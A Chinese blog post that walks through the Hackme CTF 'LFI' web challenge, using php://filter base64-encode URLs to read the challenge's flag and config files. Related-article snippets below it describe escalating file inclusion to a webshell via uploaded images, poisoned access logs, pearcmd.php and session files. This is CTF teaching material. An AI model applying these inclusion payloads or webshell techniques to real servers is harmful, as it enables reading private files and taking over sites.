LFI例子

最新推荐文章于 2024-06-06 17:36:49 发布
最新推荐文章于 2024-06-06 17:36:49 发布
阅读量270 收藏
点赞数
分类专栏: Web
原文链接:https://blog.csdn.net/qq_34072526/article/details/89431431
版权

以【Hackme CTF】Web–LFI中的LFI为例

见到LFI已经可以本能地知道这是考察本地包含了,查看源代码发现参数是page要读取pages/啥啥,直接用php://filter绕过读取本地文件

https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag

发现网页出现一行base64
Q2FuIHlvdSByZWFkIHRoZSBmbGFnPD9waHAgcmVxdWlyZSgnY29uZmlnLnBocCcpOyA/Pj8K
base64解码得
Can you read the flag<?php require('config.php'); ?>?
所以写网址为

https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/config

得到base64
PD9waHAKCiRmbGFnID0gIkZMQUd7WW9vb29vb19MRklfZzAwZF8yY1h4c1hTWVA5RVZMcklvfSI7Cg==
解码得到flag

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34072526/article/details/89431431

SYQ608
关注
专栏目录
LFI本地包含的简单利用原理实现
sx234com的博客
04-09 553
一、基本思路: 1、图片插入一句话木马。利用上传功能上传此图片。 2、利用文件包含漏洞,读取此含有一句话木马的图片,生成真正shell文件,然后拿下shell。 靶机使用dvwa 二、具体步骤: 1、制作一句话图片木马使用edjpgcom进行制作。如图将目标图片拖入文件夹中的 自动打开了软件,输入一句话木马 <?PHP fputs(fopen('shell.php','w')...
LFI漏洞利用总结(文件包含)
qq_60115503的博客
04-19 6244
原因 LFI产生的原因是由于程序员未对用户可控变量进行输入检查,此漏洞的影响可能导致泄露服务器上的敏感文件,如若攻击者能够通过其他方式在Web服务器上放置代码,那么他们便可以执行任意命令 涉及到的函数 主要涉及到的函数 include() require() include_once() require_once() magic_quotes_gpc() allow_url_fopen() allow_url_include() move_uploaded_file()
ctf中php常见的考点
热门推荐
一个安全研究员
11-06 1万+
本博文转自:大佬博客(侵权删) 总结的很详细,忍不住转载 系统变量 123456 $_POST // 获取 post 数据,是一个字典$_GET // 获取 get 数据,是一个字典$_COOKIE // 获取 cookie$_SESSION // 获取 session$_FILE // 获取上传的文件$_REQUEST // 获取 $_GET,$_POST,$_C
LFI2Shell
weixin_30500663的博客
12-01 111
Diffrent Way to Expl0it LFI! 1.如果允许上传,且可以得到路径,那么直接传shell,再LFI即可 2.不允许上传的情况下 (1)包含access.log 通过在user-agent里写入shell,然后再LFI access.log即可 原理:access.log 是访问日志文件,你的访问里如果有php代码也会记录到里面,但是有个缺点,如果这个文件大...
BugKu CTF(Web):sqli-0x1 & baby lfi & baby lfi 2
Flag少侠的博客
05-10 1743
BugKu是一个由乌云知识库(wooyun.org)推出的在线漏洞靶场。乌云知识库是一个致力于收集、整理和分享互联网安全漏洞信息的社区平台。BugKu旨在提供一个实践和学习网络安全的平台,供安全爱好者和渗透测试人员进行挑战和练习。它包含了各种不同类型的漏洞场景,如Web漏洞、系统漏洞、密码学等,参与者需要通过解决这些漏洞来获取Flag。
php LFI漏洞的一些收集
u011500307的专栏
06-08 3274
1. LFI全称是local file include,先举个最简单的例子来说明下:
LFI获取WENSHELL
代码析构师的专栏
02-10 757
关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的…不过 大家都懒得测试,我就来整理下. 1.普通本地包含; 1 ?php $query=$_GET['p'];  include($query); ?--> poc:http://127.0.
利用pearcmd.php本地文件包含(LFI
Mrs_H的博客
01-08 6031
利用pearcmd.php本地文件包含(LFI) 一.前言 pearcmd这个东西很久以前就已经复现过了,但是当时没有记录下来。这些天在整理之前比赛的wp的时候突然看见了pear的LFI到getshell,就突然想起来自己应该是利用过了的。但是怎么找也找不到之前的笔记,于是就有了再复现一遍的想法。 二.正文 1.环境的准备 这里的话我使用的是docker来搭建的一个lamp,然后在这个lamp上面进行后续的漏洞复现。至于为什么这么做呢?照P神的话来说就是因为在Docker任意版本的镜像中pear都会被默认安
LFI 绕过 Session 包含限制 Getshell
qq_45521281的博客
06-10 1437
文章目录前言用户会话会话存储会话处理LFI SessionSession Base64EncodeBypass serialize_handler=phpBypass serialize_handler=php_serializeNo session_start()表单利用攻击Conclusion session文件包含漏洞就是在用户可以控制session文件中的一部分信息,然后将这部分信息变成我们的精心构造的恶意代码,之后去包含含有我们传入恶意代码的这个session文件就可以达到攻击效果。 前言 之
LFI-CAM:学习特征重要性以获得更好的视觉解释
1355LFI-CAM:学习特征重要性以获得更好的视觉解释Kwang Hee Lee1,*,**,Chaewon Park1,*,Junghyun Oh1,2,* and NojunKwak21波音韩国工程技术中心(BKETC)2首尔国立大学摘要类激活映射(CAM)是一种用于理解...
ctf本地包括_新手入门之本地文件包含(附靶机文件)
weixin_39769984的博客
12-29 741
概述通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在本文中提到有一些技术,在CTF大赛中也经常被利用。什么是本地文件包含(LFI)漏洞?LFI允许攻击者通过浏览器包含一个服务器上的文件。当一个WEB应用程序在没有正确过滤输入数据的情况下...
【漏洞挖掘】——36、SVG SSRF Cheatsheet
Fly_鹏程万里
06-06 86
由于SVG丰富的特性集导致处理SVG的主机可能容易受到SSRF、LFI、XSS和RCE的攻击,下面所有的这些方法都指定了一个URI,它可以是绝对路径,也可以是相对路径,FILE协议和HTTP协议对于测试很重要,但是它也可以支持其他协议,这取决于实现(例如:PHP流方案),包括javascript:和data:CSS Stylesheet SVG可以通过标记包含外部样式表,就像html一样 CSS stylesheet via @import CSS Stylesheet vi
Apache HTTP 过滤器filter、开源WAF(ModSecurity)、Apache 模块开发
西京刀客
03-08 2500
在编写Apache模块时,需要具备C或C++编程经验和对Apache Web服务器的基本了解。另外,需要参考Apache的文档和API参考手册来编写代码和构建模块。
【第20篇】像人类一样阅读:自主、双向和迭代语言 场景文本识别建模
AI浩
11-14 1849
像人类一样阅读:自主、双向和迭代语言 场景文本识别建模 摘要 语言知识对场景文本识别大有裨益。然而,如何在端到端深度网络中有效地建模语言规则仍然是一个研究挑战。在本文中,我们认为语言模型的有限能力来自:1)隐式语言建模; 2) 单向特征表示;和 3) 带有噪声输入的语言模型。相应地,我们提出了一种用于场景文本识别的自主、双向和迭代的 ABINet。首先,自治建议阻止视觉和语言模型之间的梯度流,以明确执行语言建模。其次,提出了一种基于双向特征表示的新型双向完形填空网络(BCN)作为语言模型。第三,我们提出了一
【高创新】基于鹈鹕优化算法POA-CNN-BiLSTM-Attention的用客流量预测算法研究Matlab实现.rar
09-22
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
从抓包文件(tcpdump_or_wireshark)中提取国标流_pcap2ps.zip
09-22
从抓包文件(tcpdump_or_wireshark)中提取国标流_pcap2ps
图片滚动展示单击放大代码,使用prettyPhoto插件,代码兼容:IE6,IE7,IE8,Firefox,chrome
最新发布
09-22
图片滚动展示单击放大代码,使用prettyPhoto插件,代码兼容:IE6,IE7,IE8,Firefox,chrome 使用方法: 1.head区域引用样式文件prettyphoto.css,htmldivcss.css 2.head区域引用JS文件jquery.js,jquery.prettyPhoto.js,htmldivcss.js 3.在你的文件中加入<!-- 代码 开始 --><!-- 代码 结束 -->区域代码 4.点击单个图片有放大效果
基于Java的农业环境监测平台软件设计源码
09-22
本项目是基于Java开发的农业环境监测平台软件,包含51个文件,其中包括24个Java源代码文件、12个Class文件、5个Lock文件、3个Properties文件、1个Classpath文件、1个BIN文件、1个Project文件、1个JSON文件和1个LICENSE文件。此外,还有1个Markdown文档文件。该项目是基于金蝶天燕消息中间件构建的,旨在为农业领域提供一个高效、实时的环境监测解决方案,支持数据采集、实时监控、历史数据分析等功能,以提高农业生产效率和作物产量。
LFI to RCE
10-19
LFI to RCE是指通过本来只能访问服务器上的文件的漏洞(LFI),进一步利用该漏洞实现远程代码执行(RCE)。一般情况下,LFI漏洞只能让攻击者读取服务器上的文件,但是如果攻击者能够找到一个包含可执行代码的文件,就可以通过LFI漏洞执行该代码,从而实现RCE攻击。攻击者可以通过访问服务器上的日志文件等方式获取到包含可执行代码的文件的路径,然后利用LFI漏洞执行该文件中的代码,从而实现RCE攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值